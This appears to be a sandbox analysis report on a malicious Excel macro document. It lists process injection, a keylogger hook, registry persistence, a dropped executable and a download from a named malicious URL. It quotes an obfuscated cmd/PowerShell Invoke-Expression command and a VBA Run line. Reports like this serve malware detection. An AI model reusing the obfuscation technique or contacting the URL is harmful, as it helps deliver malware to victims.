Score | Category | Behavior | Classification

5/5 | Injection | Writes into the memory of another running process | -
- "c:\users\public\229393.exe" modifies memory of "c:\windows\system32\svchost.exe"
- "c:\windows\system32\svchost.exe" modifies memory of "c:\windows\explorer.exe"

5/5 | Injection | Modifies control flow of another process | -
- "c:\users\public\229393.exe" alters context of "c:\windows\system32\svchost.exe"
- "c:\windows\system32\svchost.exe" alters context of "c:\windows\explorer.exe"
- "c:\windows\system32\svchost.exe" creates thread in "c:\windows\explorer.exe"

4/5 | Process | Creates process | -
- Creates process "Cmd uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('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' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) ".
- Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
- Creates process "C:\Users\Public\229393.exe".
- Creates process "C:\Windows\system32\svchost.exe".

4/5 | Process | Reads from memory of another process | -
- "c:\windows\system32\svchost.exe" reads from "c:\windows\explorer.exe".

4/5 | Device | Monitors keyboard input | Keylogger
- Installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes.

4/5 | Process | Executes encoded PowerShell script | -
- Executes encoded PowerShell script to possibly hide malicious payload.

4/5 | Network | Downloads data | Downloader
- URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class".

3/5 | Network | Performs DNS request | -
- Resolves host name "ihbnaoisdnasdasd.com".

3/5 | Persistence | Installs system startup script or application | -
- Adds "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe" to Windows startup via registry.

3/5 | PE | Executes dropped PE file | -
- Executes dropped file "c:\users\public\229393.exe".

2/5 | Network | Associated with known malicious/suspicious URLs | -
- URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class" is known as malicious URL.

2/5 | Network | Connects to HTTP server | -
- URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class".

2/5 | PE | Drops PE file | Dropper
- Drops file "c:\users\public\229393.exe".

2/5 | VBA Macro | Creates suspicious COM object | -
- CreateObject(AhwlacHHm).Run UDMwkLKaOX + Chr(VBA.vbKeyC) + fTvSPumjwc + Ywiazs + BRlkdR, vbHide

1/5 | Process | Creates system object | -
- Creates mutex with name "Global\.net clr networking".
- Creates mutex with name "{B29A7695-69BA-B440-8306-AD28679A31DC}".
- Creates mutex with name "{BE6B9E68-0520-A091-7FD2-09D423264D48}".
- Creates mutex with name "Local\{722AD44B-2987-7426-43C6-6DE8275AF19C}".
- Creates mutex with name "Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6}".
- Creates mutex with name "Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954}".

1/5 | Process | Overwrites code | -
- Overwrites code to possibly hide behavior.

1/5 | VBA Macro | Executes macro on specific worksheet event | -
- Executes macro on "Activate Workbook" event.